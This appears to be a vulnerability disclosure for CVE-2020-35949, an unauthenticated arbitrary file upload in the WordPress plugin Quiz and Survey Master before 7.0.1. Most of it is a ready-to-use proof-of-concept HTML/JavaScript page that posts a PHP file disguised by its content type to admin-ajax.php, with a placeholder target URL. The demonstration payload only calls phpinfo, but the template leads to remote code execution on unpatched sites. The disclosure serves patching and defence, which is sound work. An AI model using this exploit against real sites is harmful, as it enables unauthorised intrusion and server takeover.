Quiz and Survey Master < 7.0.1 – Arbitrary File Upload | CVE 2020-35949

Description

This flaw made it possible for unauthenticated attackers to upload arbitrary files and achieve remote code execution.

Proof of Concept

Set-up quiz that accepts file uploads, then upload file and change content-type to one set as approved. 

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/YOURURL\/wp-admin\/admin-ajax.php", true);
        xhr.setRequestHeader("Accept", "*\/*");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundary1KjFGkzH72GXWO21");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundary1KjFGkzH72GXWO21\r\n" + 
          "Content-Disposition: form-data; name=\"file\"; filename=\"posts.php\"\r\n" + 
          "Content-Type: text/plain\r\n" + 
          "\r\n" + 
          "\x3c?php phpinfo();?\x3e\r\n" + 
          "------WebKitFormBoundary1KjFGkzH72GXWO21\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "qsm_upload_image_fd_question\r\n" + 
          "------WebKitFormBoundary1KjFGkzH72GXWO21\r\n" + 
          "Content-Disposition: form-data; name=\"question_id\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundary1KjFGkzH72GXWO21--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>